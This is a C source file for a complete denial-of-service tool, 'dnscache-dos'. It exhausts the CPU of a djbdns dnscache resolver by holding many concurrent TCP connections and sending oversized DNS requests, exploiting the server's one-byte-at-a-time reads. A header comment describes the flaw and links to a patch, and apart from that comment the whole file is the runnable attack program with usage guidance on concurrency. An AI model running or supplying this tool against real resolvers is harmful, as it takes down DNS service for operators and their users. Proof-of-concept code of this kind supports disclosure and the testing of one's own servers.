
/*
 * dnscache reads incoming TCP connections one byte at a time
 * (see t_rw() function in dnscache.c), so that a single TCP packet can
 * trigger up to 65538 calls to poll() and 65538 calls to read(), thus
 * quickly burning a lot of CPU cycles.
 * 
 * fix: http://download.pureftpd.org/misc/dnscache-dont-read-tcp-one-byte-at-a-time.diff
 */

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <assert.h>
#include <errno.h>
#include <netdb.h>
#include <poll.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

#define DEFAULT_CONCURRENT_CONNECTIONS 200U
#define DELAY_BETWEEN_CONNECTIONS 100
#define TIMEOUT 10
#define REMOTE_PORT "53"

typedef enum State_ {
    STATE_FREE, STATE_CONNECTING, STATE_CONNECTED, STATE_SENDING,
    STATE_RECEIVING
} State;

typedef struct Connection_ {
    char                   reply_buf[65536U + 2U];
    const struct addrinfo *ai;
    struct pollfd         *poll_fd;
    size_t                 pos;
    int                    fd;
    State                  state;
} Connection;

/* Just a google.com request */

static const unsigned char dummy_packet[65535U + 2U] = {
    0xff, 0xff,
    0x5c, 0x9e, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x06, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x03, 0x63, 0x6f, 0x6d, 0x00,
    0x00, 0x01, 0x00, 0x01
};

static int connection_send(Connection * const connection);

static volatile sig_atomic_t quit_pending;

static int
bump_and_show_connections_count(void)
{
    static unsigned int connections_count;
    static time_t       ts_last;
    time_t              ts_now;

    connections_count++;
    time(&ts_now);
    if (ts_last != ts_now) {
        printf("\rNumber of requests made so far: %u", connections_count);
        fflush(stdout);
        ts_last = ts_now;
    }
    return 0;
}

static struct addrinfo *
resolve(const char * const host, const char * const port)
{
    struct addrinfo *ai, hints;
    int              gai_err;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_flags = 0;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;
    gai_err = getaddrinfo(host, port, &hints, &ai);
    if (gai_err != 0) {
        fprintf(stderr, "[%s]: %s\n", host, gai_strerror(gai_err));
        ai = NULL;
    }
    return ai;
}

static int
connection_close(Connection * const connection)
{
    int close_ret;

    while ((close_ret = close(connection->fd)) != 0 && errno == EINTR);
    assert(close_ret == 0);
    connection->state = STATE_FREE;
    connection->poll_fd->events = 0;

    return 0;
}

static int
connection_connect(Connection * const connection)
{
    struct timeval         tv = { .tv_sec = TIMEOUT, .tv_usec = 0 };
    const struct addrinfo *ai = connection->ai;
    int                    connect_ret;
    int                    fd;

    bump_and_show_connections_count();
    fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
    assert(fd != -1);
    assert(ioctl(fd, FIONBIO, (int []) { 1 }) == 0);
    setsockopt(fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof tv);
    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
    connection->state = STATE_FREE;
    connection->fd = fd;
    connection->pos = (size_t) 0U;
    *connection->poll_fd = (struct pollfd) {
        .fd = fd,
        .events = POLLOUT,
        .revents = 0
    };
    do {
        connect_ret =
            connect(fd, (const struct sockaddr *) connection->ai->ai_addr,
                    connection->ai->ai_addrlen);
    } while (connect_ret != 0 && errno == EINTR);
    if (connect_ret == 0) {
        connection->state = STATE_CONNECTED;
        connection_send(connection);
        return 0;
    }
    if (errno == ECONNRESET) {
        return -1;
    }
    assert(errno == EINPROGRESS);
    connection->state = STATE_CONNECTING;

    return 0;
}

static int
connection_rearm(Connection * const connection)
{
    return !(connection_close(connection) == 0 &&
             connection_connect(connection) == 0);
}

static int
connection_send(Connection * const connection)
{
    ssize_t written;

    assert((connection->poll_fd->events & POLLOUT) != 0);
    do {
        written = write(connection->fd, dummy_packet,
                        sizeof dummy_packet - connection->pos);
        if (written == (ssize_t) -1) {
            switch (errno) {
            case EAGAIN:
                connection->state = STATE_SENDING;
                return -1;
            case EBADF:
            case ECONNRESET:
#ifdef ENOTCONN
            case ENOTCONN:
#endif
                connection_rearm(connection);
                return -1;
            case EINTR:
                continue;
            default:
                assert(0);
            }
        }
        connection->pos += (size_t) written;
    } while (connection->pos < sizeof dummy_packet);
    connection->poll_fd->events = POLLIN;
    connection->poll_fd->revents = 0;
    connection->state = STATE_RECEIVING;

    return 0;
}

static int
connection_receive(Connection * const connection)
{
    ssize_t readnb;

    for(;;) {
        readnb = read(connection->fd, connection->reply_buf,
                      sizeof connection->reply_buf);
        if (readnb == (ssize_t) -1) {
            switch (errno) {
            case EBADF:
            case ECONNRESET:
#ifdef ENOTCONN
            case ENOTCONN:
#endif
                connection_rearm(connection);
            case EINTR:
                continue;
            case EAGAIN:
                return -1;
            default:
                assert(0);
            }
        }
        break;
    }
    connection_rearm(connection);

    return 0;
}

static int
event_loop(Connection * const connections,
           const unsigned int connections_count,
           struct pollfd * const poll_fds, const int timeout)
{
    Connection   *connection;
    unsigned int  i = 0U;
    int           poll_ret;

    poll_ret = poll(poll_fds, (nfds_t) connections_count, timeout);
    if (poll_ret == 0 || (poll_ret == -1 && errno == EINTR)) {
        return 0;
    }
    assert(poll_ret > 0);
    do {
        connection = &connections[i];
        if ((connection->poll_fd->revents &
             (POLLERR | POLLHUP | POLLNVAL)) != 0) {
            connection_rearm(connection);
        }
        if ((connection->poll_fd->revents & (POLLIN | POLLOUT)) != 0) {
            connection->poll_fd->revents = 0;
            switch (connection->state) {
            case STATE_FREE:
                connection_connect(connection);
                break;
            case STATE_CONNECTED: case STATE_CONNECTING: case STATE_SENDING:
                connection_send(connection);
                break;
            case STATE_RECEIVING:
                connection_receive(connection);
                break;
            }
        }
    } while (++i < connections_count);

    return 0;
}

static void
usage(void) {
    puts("\nUsage: dnscache-dos <host> [concurrent requests (default=200)]\n"
         "Burn CPU cycles on a dnscache resolver by sending large TCP requests\n\n"
         "A low number of concurrent requests like 2 or 3 is good enough.\n");
    exit(1);
}

static void
sig_handler(const int sig)
{
    (void) sig;
    quit_pending = 1;
}

int
main(int argc, char *argv[])
{
    Connection      *connections;
    struct addrinfo *ai;
    struct pollfd   *poll_fds;
    unsigned int     connections_count = DEFAULT_CONCURRENT_CONNECTIONS;
    unsigned int     i;

    if (argc <= 1 || argc > 3) {
        usage();
    }
    if ((ai = resolve(argv[1], REMOTE_PORT)) == NULL) {
        exit(1);
    }
    if (argc == 3) {
        connections_count = (unsigned int) strtoul(argv[2], NULL, 10);
        assert(connections_count > 0U);
    }
    assert((connections = calloc(connections_count,
                                 sizeof *connections)) != NULL);
    assert((poll_fds = calloc(connections_count,
                              sizeof *poll_fds)) != NULL);
    i = 0U;
    do {
        connections[i].ai = ai;
        connections[i].poll_fd = &poll_fds[i];
        connection_connect(&connections[i]);
        i++;
        event_loop(connections, i, poll_fds, DELAY_BETWEEN_CONNECTIONS);
    } while (i < connections_count);

    signal(SIGINT, sig_handler);
    signal(SIGTERM, sig_handler);
    signal(SIGQUIT, sig_handler);
    do {
        event_loop(connections, connections_count, poll_fds, -1);
    } while (quit_pending == (sig_atomic_t) 0);

    freeaddrinfo(ai);
    free(connections);
    free(poll_fds);

    return 0;
}
